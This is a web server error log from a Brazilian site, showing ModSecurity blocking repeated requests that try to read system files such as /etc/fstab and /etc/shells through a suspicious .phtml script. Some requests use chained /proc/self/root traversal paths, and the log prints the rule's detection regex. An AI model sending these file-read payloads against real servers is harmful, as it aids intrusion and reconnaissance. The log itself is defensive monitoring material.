[Thu Mar 19 16:07:45.845950 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.107:34018] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJgfXLqtnMIWvjpaJDmQAAApA"]
[Thu Mar 19 16:07:53.151071 2026] [:error] [pid 5816:tid 140411658000128] [client 57.141.18.4:34186] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJiJfmNfuxceSuAEK6aAAAAco"]
[Thu Mar 19 16:07:59.121726 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59220] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:08:07.111995 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.58:34246] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJl-oXxyEfFpUF8f8xlAAAAU8"]
[Thu Mar 19 16:08:09.253987 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.29:34588] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJmf-YZRR_7pZ7nDKv8QAAA9E"]
[Thu Mar 19 16:08:16.214387 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.78:34102] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJoBCii7xarUs8iHYPVwAAAgQ"]
[Thu Mar 19 16:08:22.126149 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59868] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:08:31.770316 2026] [:error] [pid 19655:tid 140411658000128] [client 74.7.244.43:52726] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxJr01ujooLWdUDGy75-wAAAEo"]
[Thu Mar 19 16:08:44.176170 2026] [:error] [pid 17653:tid 140411616036608] [client 57.141.18.84:35424] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJvMdf6f5d65gmYZSftgAAAs8"]
[Thu Mar 19 16:08:46.131503 2026] [proxy_fcgi:error] [pid 7893:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60572] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:08:48.124127 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.15:35534] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJwP-YZRR_7pZ7nDKwAAAAA9E"]
[Thu Mar 19 16:08:48.437869 2026] [:error] [pid 21563:tid 140411557287680] [client 57.141.18.64:35544] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJwEpm7ZmxKZTM4bZpuQAAA5Y"]
[Thu Mar 19 16:08:50.648077 2026] [:error] [pid 19655:tid 140411658000128] [client 57.141.18.123:35604] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJwk1ujooLWdUDGy76AgAAAEo"]
[Thu Mar 19 16:09:00.476135 2026] [:error] [pid 30077:tid 140411632822016] [client 57.141.18.35:35940] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJzPu8EFLIOrSqIpvOIQAAAk0"]
[Thu Mar 19 16:09:09.101861 2026] [proxy_fcgi:error] [pid 20435:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33098] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:09:10.742840 2026] [proxy_fcgi:error] [pid 7545:tid 140411708356352] [client 209.141.57.163:36224] AH01071: Got error 'Primary script unknown'
[Thu Mar 19 16:09:11.155045 2026] [:error] [pid 17887:tid 140411699963648] [client 57.141.18.103:36280] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJ1wkwaGbbGflqUZDwVQAAAMU"]
[Thu Mar 19 16:09:11.695790 2026] [:error] [pid 19655:tid 140411632822016] [client 57.141.18.59:36298] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJ101ujooLWdUDGy76DwAAAE0"]
[Thu Mar 19 16:09:14.663635 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.118:36352] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJ2hCii7xarUs8iHYPbgAAAgI"]
[Thu Mar 19 16:09:15.106890 2026] [:error] [pid 7893:tid 140411691570944] [client 57.141.18.34:36362] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJ2xCii7xarUs8iHYPcQAAAgY"]
[Thu Mar 19 16:09:17.937060 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.46:36430] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJ3fXLqtnMIWvjpaJD4AAAAo8"]
[Thu Mar 19 16:09:19.442331 2026] [mime_magic:error] [pid 5816:tid 140411725141760] (70014)End of file found: [client 66.249.74.169:35782] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 16:09:23.515213 2026] [:error] [pid 7545:tid 140411708356352] [client 74.7.228.61:50558] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxJ438B84UptSoTJtY0tQAAAYQ"]
[Thu Mar 19 16:09:31.121773 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33858] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:09:32.216485 2026] [mime_magic:error] [pid 8307:tid 140411733534464] (70014)End of file found: [client 74.7.243.128:53764] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/lock
[Thu Mar 19 16:09:32.216790 2026] [access_compat:error] [pid 8307:tid 140411733534464] [client 74.7.243.128:53764] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/lock
[Thu Mar 19 16:09:33.372874 2026] [mime_magic:error] [pid 19655:tid 140411632822016] (70014)End of file found: [client 57.141.18.115:36866] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 16:09:36.650214 2026] [:error] [pid 19655:tid 140411708356352] [client 57.141.18.88:36954] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJ8E1ujooLWdUDGy76IwAAAEQ"]
[Thu Mar 19 16:09:48.545698 2026] [mime_magic:error] [pid 7893:tid 140411708356352] (70014)End of file found: [client 57.141.18.71:37224] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 16:09:54.137773 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34616] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:10:16.091033 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35250] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:10:28.327496 2026] [:error] [pid 8307:tid 140411548894976] [client 74.7.243.128:47082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKJL-FhjpZGs9ba8qPqgAAAxc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:10:39.121841 2026] [proxy_fcgi:error] [pid 7235:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35800] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:10:40.826230 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:42208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKMPXLqtnMIWvjpaJEJwAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:10:44.262339 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:59158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKNOoXxyEfFpUF8f8x-wAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:10:50.358354 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:59174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKOsdf6f5d65gmYZSf2QAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:10:54.383275 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:44368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKPvqxLDW4GITHUkSOBgAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:11:01.137830 2026] [proxy_fcgi:error] [pid 21219:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36396] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:11:08.036295 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:44382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKTAkwaGbbGflqUZDwmQAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
